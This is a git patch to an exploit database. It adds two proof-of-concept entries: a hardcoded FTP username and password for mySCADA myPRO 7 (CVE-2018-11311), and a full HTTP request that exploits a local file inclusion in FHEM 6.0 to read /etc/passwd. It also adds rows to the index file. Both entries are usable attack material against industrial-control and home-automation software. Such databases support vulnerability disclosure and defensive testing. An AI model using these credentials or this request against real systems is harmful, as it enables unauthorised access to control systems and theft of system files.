From c22ad85b5703c393f4e6ad1688f01a054dd9e230 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 26 Jun 2020 05:01:58 +0000 Subject: [PATCH] DB: 2020-06-26 2 changes to exploits/shellcodes mySCADA myPRO 7 - Hardcoded Credentials FHEM 6.0 - Local File Inclusion --- exploits/hardware/remote/48620.txt | 18 ++++++++++++++++++ exploits/php/webapps/48621.txt | 26 ++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 46 insertions(+) create mode 100644 exploits/hardware/remote/48620.txt create mode 100644 exploits/php/webapps/48621.txt diff --git a/exploits/hardware/remote/48620.txt b/exploits/hardware/remote/48620.txt new file mode 100644 index 000000000..d2867f4a0 --- /dev/null +++ b/exploits/hardware/remote/48620.txt @@ -0,0 +1,18 @@ +# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials +# Date: 2018-07-02 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: http://myscada.org +# Software Link: https://www.myscada.org/mypro/ +# Version: v7.0.45 +# Tested on: Windows/Linux +# CVE-2018-11311 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311 +# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password + +# PoC + +ftp [IP] 2121 + +username: myscada + +password: Vikuk63 \ No newline at end of file diff --git a/exploits/php/webapps/48621.txt b/exploits/php/webapps/48621.txt new file mode 100644 index 000000000..bbc00ece2 --- /dev/null +++ b/exploits/php/webapps/48621.txt @@ -0,0 +1,26 @@ +# Exploit Title: FHEM 6.0 - Local File Inclusion +# Date: 2020-02-10 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://fhem.de/ +# Software Link: https://fhem.de/#Download +# Version: v6.0 +# Tested on: Windows +# Link: https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability + +# PoC + +To exploit vulnerability, someone could use 'http:// +[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' +request +to get some informations from the target by changing "file" parameter. + +GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) +Gecko/20100101 Firefox/74.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 87baaa104..cc9412bd6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18201,6 +18201,7 @@ id,file,description,date,author,type,platform,port 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux, 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple, 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple, +48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42876,3 +42877,4 @@ id,file,description,date,author,type,platform,port 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php, 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php, 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple, +48621,exploits/php/webapps/48621.txt,"FHEM 6.0 - Local File Inclusion",2020-06-25,"Emre ÖVÜNÇ",webapps,php,